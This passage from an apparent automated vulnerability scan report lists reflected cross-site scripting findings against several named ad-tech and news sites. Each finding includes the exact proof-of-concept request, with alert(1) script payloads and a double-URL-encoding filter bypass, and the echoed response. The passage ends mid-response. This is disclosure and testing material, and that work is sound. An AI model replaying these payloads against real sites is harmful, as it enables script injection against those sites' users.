GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event4eca2<script>alert(1)</script>359798be485&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 24
ETag: "0194a4c93866eccde160f1035af0809f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 5bfc14f4ea2617979a6a978686383b96c0f6e602
Z-REQUEST-HANDLED-BY: www2
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event4eca2<script>alert(1)</script>359798be485 is not a valid search category."}}
2.40. http://go.savannahnow.com/partner_json/search [when parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload 981f1<script>alert(1)</script>87e3a8b3059 was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=981f1<script>alert(1)</script>87e3a8b3059&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 13
ETag: "6986547c32d2f6c71a345b5533518c4f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: ac041bd2a8770ddbb4df97f54f3d6fc3eb49d0b7
Z-REQUEST-HANDLED-BY: www29
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 464

{"rsp":{"status":"failed","msg":"Unrecognized date format: 981f1<script>alert(1)</script>87e3a8b3059 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...
2.41. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201ed"-alert(1)-"075db5ed9f was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 581

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
QMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
2.42. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39080"-alert(1)-"bab3b8cff84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831720_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 585

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
MIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
2.43. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4e58"-alert(1)-"f14e903ca51 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 582

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit
...[SNIP]...
2.44. http://js.revsci.net/gateway/gw.js [bpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db834'%3balert(1)//bfe5e4d0684 was submitted in the bpid parameter. This input was echoed as db834';alert(1)//bfe5e4d0684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0277db834'%3balert(1)//bfe5e4d0684 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:26 GMT
Content-Length: 6077

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');else DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...
2.45. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e011b<script>alert(1)</script>84c98d127a9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610e011b<script>alert(1)</script>84c98d127a9&bpid=S0277 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610E011B<SCRIPT>ALERT(1)</SCRIPT>84C98D127A9" was not recognized.
*/
2.46. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/reveal/129534/5011/Expand_Content

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e was submitted in the REST URL parameter 3. This input was echoed as ff9a5<script>alert(1)</script>c42ce07177e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/reveal/129534ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e/5011/Expand_Content?invalidate=1315849766118 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:17 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 104
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><reveal>    <success id='129534ff9a5<script>alert(1)</script>c42ce07177e' /></reveal></rsp>
2.47. http://metrics.impactengine.com/rest/view/129534/5011/0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/0

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe was submitted in the REST URL parameter 3. This input was echoed as 282db<script>alert(1)</script>ec15e8ec8fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/129534282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe/5011/0?invalidate=1315849757167 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:03 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534282db<script>alert(1)</script>ec15e8ec8fe' /></mouse_over</rsp>
2.48. http://metrics.impactengine.com/rest/view/129534/5011/30 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/30

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb was submitted in the REST URL parameter 3. This input was echoed as 3bc3b<script>alert(1)</script>5e97cebc5eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/1295343bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb/5011/30?invalidate=1315849787169 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:21 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='1295343bc3b<script>alert(1)</script>5e97cebc5eb' /></mouse_over</rsp>
2.49. http://ms0.erovinmo.com/keywords/instrument.js [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms0.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 2605f<script>alert(1)</script>490f7962273 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_02605f<script>alert(1)</script>490f7962273&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842&referrer=http%3A//drupal.org/cases&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315849722.416&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms0.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:52 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "eb9171331ec7a7070901e13e357378cd"
X-Runtime: 52
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_02605f<script>alert(1)</script>490f7962273({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})
2.50. http://ms4.erovinmo.com/keywords/instrument.js [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms4.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 97df2<script>alert(1)</script>c347156b75c was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_097df2<script>alert(1)</script>c347156b75c&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842;%20s_cc=true;%20s_sq=%5B%5BB%5D%5D;%20__utma=71223567.258103543.1315849717.1315849717.1315849717.1;%20__utmb=71223567.2.10.1315849717;%20__utmc=71223567;%20__utmz=71223567.1315849717.1.1.utmcsr=drupal.org&referrer=http%3A//www.nowpublic.com/&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315850026.67&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms4.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lsx0=2MCV-LSx0ZOAPAI0GDGJ7

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:57:37 GMT
Server: Apache/2.2.14 (Ubuntu)
